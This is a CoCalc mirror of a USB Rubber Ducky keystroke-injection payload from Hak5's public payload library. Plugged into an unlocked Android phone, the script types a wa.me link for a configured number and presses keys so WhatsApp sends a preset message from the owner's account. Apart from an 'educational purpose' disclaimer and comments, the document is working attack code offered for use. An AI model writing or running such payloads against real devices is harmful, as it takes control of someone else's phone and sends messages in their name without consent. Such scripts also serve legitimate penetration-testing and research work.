Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/mobile/Android/WhatsappMessageSender/payload.txt
2971 views
1
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
2
REM # TITLE: Whatsapp Message Sender
3
REM #
4
REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.0
5
REM #
6
REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it.
7
REM #
8
REM # Tested OS: Android version 12
9
REM #
10
REM # Note: Script won't work on locked devices
11
REM #
12
REM # Date: 08/03/2023
13
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
14
15
DEFINE PHONENUMBER +91XXXXXXXXXX
16
DEFINE MESSAGE Hi this is Gopalsamy Rajendran
17
18
REM #-------------------------------------------------
19
REM # Below lines will open search engine and type https://
20
DELAY 1000
21
GUI r
22
DELAY 100
23
STRING h
24
DELAY 100
25
STRING t
26
DELAY 100
27
STRING t
28
DELAY 100
29
STRING p
30
DELAY 100
31
STRING s
32
DELAY 500
33
DELAY 100
34
STRING :
35
DELAY 100
36
STRING /
37
DELAY 100
38
STRING /
39
DELAY 100
40
REM #-------------------------------------------------
41
42
REM #-------------------------------------------------
43
REM # Below lines will enter wa.me after https://
44
REM # Replace the mobile number with your's
45
46
STRING wa.me/
47
STRING PHONENUMBER
48
ENTER
49
DELAY 5000
50
REM #-------------------------------------------------
51
52
REM #-------------------------------------------------
53
REM # Below message will be sent to the target number confiugured above
54
REM # Replace the message with your own message
55
STRING MESSAGE
56
TAB
57
TAB
58
ENTER
59
DELAY 1000
60
REM #-------------------------------------------------
61
62
63